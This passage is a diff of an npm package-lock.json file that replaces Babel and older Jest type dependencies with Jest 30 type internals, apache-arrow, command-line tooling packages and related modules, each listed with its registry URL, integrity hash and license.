"node_modules/@types/jest/node_modules/@jest/types": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/types/-/types-30.0.1.tgz", + "integrity": "sha512-HGwoYRVF0QSKJu1ZQX0o5ZrUrrhj0aOOFA8hXrumD7SIzjouevhawbTjmXdwOmURdGluU9DM/XvGm3NyFoiQjw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/types": "^7.22.5" + "@jest/pattern": "30.0.1", + "@jest/schemas": "30.0.1", + "@types/istanbul-lib-coverage": "^2.0.6", + "@types/istanbul-reports": "^3.0.4", + "@types/node": "*", + "@types/yargs": "^17.0.33", + "chalk": "^4.1.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", + "node_modules/@types/jest/node_modules/@sinclair/typebox": { + "version": "0.34.37", + "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.34.37.tgz", + "integrity": "sha512-2TRuQVgQYfy+EzHRTIvkhv2ADEouJ2xNS/Vq+W5EuuewBdOrvATvljZTxHWZSTYr2sTjTHpGvucaGAt67S2akw==", "dev": true, - "engines": { - "node": ">=6.9.0" - } + "license": "MIT" }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", + "node_modules/@types/jest/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", "dev": true, + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/helper-validator-option": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.22.5.tgz", - "integrity": "sha512-R3oB6xlIVKUnxNUxbmgq7pKjxpru24zlimpE8WK47fACIlM0II/Hm1RS8IaOI7NgCr6LNS+jl5l75m20npAziw==", + "node_modules/@types/jest/node_modules/ci-info": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.3.0.tgz", + "integrity": "sha512-l+2bNRMiQgcfILUi33labAZYIWlH1kWDp+ecNo5iisRKrbm0xcRyCww71/YU0Fkw0mAFpz9bJayXPjey6vkmaQ==", "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "license": "MIT", "engines": { - "node": ">=6.9.0" + "node": ">=8" } }, - "node_modules/@babel/helpers": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.22.6.tgz", - "integrity": "sha512-YjDs6y/fVOYFV8hAf1rxd1QvR9wJe1pDBZ2AREKq/SDayfPzgk0PBnVuTCE5X1acEpMMNOVUqoe+OwiZGJ+OaA==", + "node_modules/@types/jest/node_modules/expect": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/expect/-/expect-30.0.4.tgz", + "integrity": "sha512-dDLGjnP2cKbEppxVICxI/Uf4YemmGMPNy0QytCbfafbpYk9AFQsxb8Uyrxii0RPK7FWgLGlSem+07WirwS3cFQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/template": "^7.22.5", - "@babel/traverse": "^7.22.6", - "@babel/types": "^7.22.5" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", + "node_modules/@types/jest/node_modules/jest-diff": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-30.0.4.tgz", + "integrity": "sha512-TSjceIf6797jyd+R64NXqicttROD+Qf98fex7CowmlSn7f8+En0da1Dglwr1AXxDtVizoxXYZBlUQwNhoOXkNw==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" + "@jest/diff-sequences": "30.0.1", + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=6.9.0" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", + "node_modules/@types/jest/node_modules/jest-matcher-utils": { + "version": "30.0.4", + "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-30.0.4.tgz", + "integrity": "sha512-ubCewJ54YzeAZ2JeHHGVoU+eDIpQFsfPQs0xURPWoNiO42LGJ+QGgfSf+hFIRplkZDkhH5MOvuxHKXRTUU3dUQ==", "dev": true, + "license": "MIT", "dependencies": { - "color-convert": "^1.9.0" + "@jest/get-type": "30.0.1", + "chalk": "^4.1.2", + "jest-diff": "30.0.4", + "pretty-format": "30.0.2" }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "node_modules/@types/jest/node_modules/jest-message-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-30.0.2.tgz", + "integrity": "sha512-vXywcxmr0SsKXF/bAD7t7nMamRvPuJkras00gqYeB1V0WllxZrbZ0paRr3XqpFU2sYYjD0qAaG2fRyn/CGZ0aw==", "dev": true, + "license": "MIT", "dependencies": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" + "@babel/code-frame": "^7.27.1", + "@jest/types": "30.0.1", + "@types/stack-utils": "^2.0.3", + "chalk": "^4.1.2", + "graceful-fs": "^4.2.11", + "micromatch": "^4.0.8", + "pretty-format": "30.0.2", + "slash": "^3.0.0", + "stack-utils": "^2.0.6" }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", + "node_modules/@types/jest/node_modules/jest-mock": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-30.0.2.tgz", + "integrity": "sha512-PnZOHmqup/9cT/y+pXIVbbi8ID6U1XHRmbvR7MvUy4SLqhCbwpkmXhLbsWbGewHrV5x/1bF7YDjs+x24/QSvFA==", "dev": true, + "license": "MIT", "dependencies": { - "color-name": "1.1.3" - } - }, - "node_modules/@babel/highlight/node_modules/color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "node_modules/@babel/highlight/node_modules/escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true, - "engines": { - "node": ">=0.8.0" - } - }, - "node_modules/@babel/highlight/node_modules/has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true, + "@jest/types": "30.0.1", + "@types/node": "*", + "jest-util": "30.0.2" + }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/highlight/node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "node_modules/@types/jest/node_modules/jest-util": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-30.0.2.tgz", + "integrity": "sha512-8IyqfKS4MqprBuUpZNlFB5l+WFehc8bfCe1HSZFHzft2mOuND8Cvi9r1musli+u6F3TqanCZ/Ik4H4pXUolZIg==", "dev": true, + "license": "MIT", "dependencies": { - "has-flag": "^3.0.0" + "@jest/types": "30.0.1", + "@types/node": "*", + "chalk": "^4.1.2", + "ci-info": "^4.2.0", + "graceful-fs": "^4.2.11", + "picomatch": "^4.0.2" }, "engines": { - "node": ">=4" + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", + "node_modules/@types/jest/node_modules/picomatch": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.2.tgz", + "integrity": "sha512-M7BAV6Rlcy5u+m6oPhAPFgJTzAioX/6B0DxyvDlo9l8+T3nLKbrczg2WLUyzd45L8RqfUMyGPzekbMvX2Ldkwg==", "dev": true, - "bin": { - "parser": "bin/babel-parser.js" - }, + "license": "MIT", "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "node": ">=12" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/sponsors/jonschlinkert" } }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "node_modules/@types/jest/node_modules/pretty-format": { + "version": "30.0.2", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-30.0.2.tgz", + "integrity": "sha512-yC5/EBSOrTtqhCKfLHqoUIAXVRZnukHPwWBJWR7h84Q3Be1DRQZLncwcfLoPA5RPQ65qfiCMqgYwdUuQ//eVpg==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "@jest/schemas": "30.0.1", + "ansi-styles": "^5.2.0", + "react-is": "^18.3.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": "^18.14.0 || ^20.0.0 || ^22.0.0 || >=24.0.0" } }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, + "node_modules/@types/node": { + "version": "20.17.46", + "resolved": "https://registry.npmjs.org/@types/node/-/node-20.17.46.tgz", + "integrity": "sha512-0PQHLhZPWOxGW4auogW0eOQAuNIlCYvibIpG67ja0TOJ6/sehu+1en7sfceUn+QQtx4Rk3GxbLNwPh0Cav7TWw==", + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "undici-types": "~6.19.2" } }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "node_modules/@types/stack-utils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.3.tgz", + "integrity": "sha512-9aEbYZ3TbYMznPdcdr3SmIrLXwC/AKZXQeCf9Pgao5CKb8CyHuEX5jzWPTkvregvhRJHcpRO6BFoGW9ycaOkYw==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "license": "MIT" }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "node_modules/@types/yargs": { + "version": "17.0.33", + "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.33.tgz", + "integrity": "sha512-WpxBCKWPLr4xSsHgz511rFJAM+wS28w2zEO1QDNY5zM/S8ok70NNfztH0xwhqKyaK0OHCbN98LDAZuy1ctxDkA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "@types/yargs-parser": "*" } }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", - "dev": true, + "node_modules/@types/yargs-parser": { + "version": "21.0.0", + "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", + "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", + "dev": true + }, + "node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" + "color-convert": "^2.0.1" }, "engines": { - "node": ">=6.9.0" + "node": ">=8" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" } }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, + "node_modules/apache-arrow": { + "version": "19.0.1", + "resolved": "https://registry.npmjs.org/apache-arrow/-/apache-arrow-19.0.1.tgz", + "integrity": "sha512-APmMLzS4qbTivLrPdQXexGM4JRr+0g62QDaobzEvip/FdQIrv2qLy0mD5Qdmw4buydtVJgbFeKR8f59I6PPGDg==", + "license": "Apache-2.0", "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "@swc/helpers": "^0.5.11", + "@types/command-line-args": "^5.2.3", + "@types/command-line-usage": "^5.0.4", + "@types/node": "^20.13.0", + "command-line-args": "^6.0.1", + "command-line-usage": "^7.0.1", + "flatbuffers": "^24.3.25", + "json-bignum": "^0.0.3", + "tslib": "^2.6.2" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "bin": { + "arrow2csv": "bin/arrow2csv.js" } }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node_modules/array-back": { + "version": "6.2.2", + "resolved": "https://registry.npmjs.org/array-back/-/array-back-6.2.2.tgz", + "integrity": "sha512-gUAZ7HPyb4SJczXAMUXMGAvI976JoK3qEx9v1FTmeYuJj0IBiaKttG1ydtGKdkfqWkIkouke7nG8ufGy77+Cvw==", + "license": "MIT", + "engines": { + "node": ">=12.17" } }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "node_modules/braces": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", + "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" + "fill-range": "^7.1.1" }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": ">=8" } }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, + "node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" }, "engines": { - "node": ">=6.9.0" + "node": ">=10" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" } }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, + "node_modules/chalk-template": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/chalk-template/-/chalk-template-0.4.0.tgz", + "integrity": "sha512-/ghrgmhfY8RaSdeo43hNXxpoHAtxdbskUHjPpfqUWGttFgycUhYPGx3YZBCnUCvOa7Doivn1IZec3DEGFoMgLg==", + "license": "MIT", "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" + "chalk": "^4.1.2" }, "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" + "node": ">=12" }, - "engines": { - "node": ">=6.9.0" + "funding": { + "url": "https://github.com/chalk/chalk-template?sponsor=1" } }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" + "color-name": "~1.1.4" }, "engines": { - "node": ">=6.9.0" + "node": ">=7.0.0" } }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" }, - "node_modules/@elastic/elasticsearch": { - "version": "8.18.2", - "resolved": "https://registry.npmjs.org/@elastic/elasticsearch/-/elasticsearch-8.18.2.tgz", - "integrity": "sha512-2pOc/hGdxkbaDavfAlnUfjJdVsFRCGqg7fpsWJfJ2UzpgViIyojdViHg8zOCT1J14lAwvDgb9CNETWa3SBZRfw==", - "license": "Apache-2.0", + "node_modules/command-line-args": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/command-line-args/-/command-line-args-6.0.1.tgz", + "integrity": "sha512-Jr3eByUjqyK0qd8W0SGFW1nZwqCaNCtbXjRo2cRJC1OYxWl3MZ5t1US3jq+cO4sPavqgw4l9BMGX0CBe+trepg==", + "license": "MIT", "dependencies": { - "@elastic/transport": "^8.9.6", - "apache-arrow": "18.x - 19.x", - "tslib": "^2.4.0" + "array-back": "^6.2.2", + "find-replace": "^5.0.2", + "lodash.camelcase": "^4.3.0", + "typical": "^7.2.0" }, "engines": { - "node": ">=18" + "node": ">=12.20" + }, + "peerDependencies": { + "@75lb/nature": "latest" + }, + "peerDependenciesMeta": { + "@75lb/nature": { + "optional": true + } } }, - "node_modules/@elastic/transport": { - "version": "8.9.6", - "resolved": "https://registry.npmjs.org/@elastic/transport/-/transport-8.9.6.tgz", - "integrity": "sha512-v71jgmZtgPg2ouXF5KTPxU1a6z7YYc8nazAS7jLySteC/vrShs1OJh6oEEeo5oDc19MYUofV/JV1h5vqJVBXOw==", - "license": "Apache-2.0", + "node_modules/command-line-usage": { + "version": "7.0.3", + "resolved": "https://registry.npmjs.org/command-line-usage/-/command-line-usage-7.0.3.tgz", + "integrity": "sha512-PqMLy5+YGwhMh1wS04mVG44oqDsgyLRSKJBdOo1bnYhMKBW65gZF1dRp2OZRhiTjgUHljy99qkO7bsctLaw35Q==", + "license": "MIT", "dependencies": { - "@opentelemetry/api": "1.x", - "debug": "^4.4.0", - "hpagent": "^1.2.0", - "ms": "^2.1.3", - "secure-json-parse": "^3.0.1", - "tslib": "^2.8.1", - "undici": "^6.21.1" + "array-back": "^6.2.2", + "chalk-template": "^0.4.0", + "table-layout": "^4.1.0", + "typical": "^7.1.1" }, "engines": { - "node": ">=18" + "node": ">=12.20.0" } }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, + "node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": 